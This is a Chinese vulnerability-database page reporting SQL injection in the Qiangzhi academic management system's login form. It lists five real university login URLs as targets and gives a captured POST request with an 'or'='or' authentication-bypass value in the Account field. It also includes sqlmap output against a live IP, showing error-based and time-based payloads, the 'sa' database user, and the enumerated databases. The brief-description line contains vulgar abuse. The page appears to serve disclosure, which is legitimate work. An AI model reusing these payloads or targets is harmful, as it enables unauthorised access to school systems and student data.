|强智科技教务管理系统SQL注射漏洞 - VULHUB开源网络安全威胁库

强智科技教务管理系统SQL注射漏洞

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述：男：问世间情为何物,只...女:一个大嘴巴子打上去,啪！去你妈逼的程序员还想找女朋友,活该死在代码上. ### 详细说明：应乌云要求，五个案例！ ``` http://jwxt.hifa.edu.cn/jiaowu/jwxs/login.asp http://221.232.159.24/dhjw/jwxs/login.asp http://jiaowu.hustwenhua.net/jwxs/login.asp http://xscx.cmcedu.cn/jwxs/login.asp http://jwxt.hycgy.com:5000/jwxs/login.asp ``` 登录的时候抓包 [<img src="https://images.seebug.org/upload/201503/23134131b0f9417332aaf2facd5751138e58292a.png" alt="QQ截图20150323134521.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/23134131b0f9417332aaf2facd5751138e58292a.png) [<img src="https://images.seebug.org/upload/201503/231341522349117bd2b5164406c21be381e89242.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/231341522349117bd2b5164406c21be381e89242.png) ``` POST /dhjw/jwxs/login.asp HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Referer: http://221.232.159.24/dhjw/jwxs/login.asp Accept-Language: zh-CN User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Host: 221.232.159.24 Content-Length: 108 DNT: 1 Connection: Keep-Alive Cache-Control: no-cache Cookie: LoginLb=; ASPSESSIONIDCSACRCTD=MMHJDOJDHFEIOOCPPELOLJME datetime=2015-3-23+13%3A12%3A50&loginNum=&Account=%27or%27%3D%27or%27&Password=l&B1=%A1%A1%C8%B7%B6%A8%A1%A1 ``` [<img src="https://images.seebug.org/upload/201503/23134257049f1fe51cb24b085eb4a35f8897616e.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/23134257049f1fe51cb24b085eb4a35f8897616e.png) [<img src="https://images.seebug.org/upload/201503/2313440159ab6f8528b8f3f0031052af6310006e.png" alt="123.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/2313440159ab6f8528b8f3f0031052af6310006e.png) ``` sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: POST Parameter: Account Type: error-based Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause Payload: datetime=2015-3-23 13:12:50&loginNum=&Account=-2532' OR 7256=CONVER T(INT,(SELECT CHAR(113) CHAR(106) CHAR(112) CHAR(122) CHAR(113) (SELECT (CASE WH EN (7256=7256) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(112) CHAR(118) C HAR(113) CHAR(113))) AND 'ogOj'='ogOj&Password=l&B1=%A1%A1%C8%B7%B6%A8%A1%A1 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: datetime=2015-3-23 13:12:50&loginNum=&Account=-4128' OR 4975=(SELEC T COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS s ys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'QvyA'='QvyA&Passwor d=l&B1=%A1%A1%C8%B7%B6%A8%A1%A1 --- [13:47:47] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 web application technology: Microsoft IIS 6.0 back-end DBMS: Microsoft SQL Server 2008 [13:47:47] [INFO] fetching current user you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to me rge them in futher requests? [Y/n] Y [13:47:49] [INFO] retrieved: sa current user: 'sa' [13:47:49] [INFO] fetching current database [13:47:49] [INFO] retrieved: dhjw current database: 'dhjw' [13:47:49] [INFO] fetching database names [13:47:49] [WARNING] reflective value(s) found and filtering out [13:47:49] [WARNING] the SQL query provided does not return any output [13:47:49] [WARNING] in case of continuous data retrieval problems you are advis ed to try a switch '--no-cast' or switch '--hex' [13:47:49] [INFO] fetching number of databases [13:47:49] [WARNING] time-based comparison needs larger statistical model. Makin g a few dummy requests, please wait.. [13:47:51] [WARNING] it is very important not to stress the network adapter's ba ndwidth during usage of time-based payloads [13:47:52] [ERROR] unable to retrieve the number of databases [13:47:52] [INFO] retrieved: dhjw [13:47:52] [INFO] retrieved: master [13:47:52] [INFO] retrieved: tempdb [13:47:53] [INFO] retrieved: model [13:47:53] [INFO] retrieved: msdb [13:47:53] [INFO] retrieved: ReportServer [13:47:53] [INFO] retrieved: ReportServerTempDB [13:47:53] [INFO] retrieved: dhjw [13:47:54] [INFO] retrieved: available databases [7]: [*] dhjw [*] master [*] model [*] msdb [*] ReportServer [*] ReportServerTempDB [*] tempdb [13:47:54] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 23 times [13:47:54] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\ou tput\221.232.159.24' [*] shutting down at 13:47:54 ``` ### 漏洞证明： [<img src="https://images.seebug.org/upload/201503/2313440159ab6f8528b8f3f0031052af6310006e.png" alt="123.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/2313440159ab6f8528b8f3f0031052af6310006e.png)

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™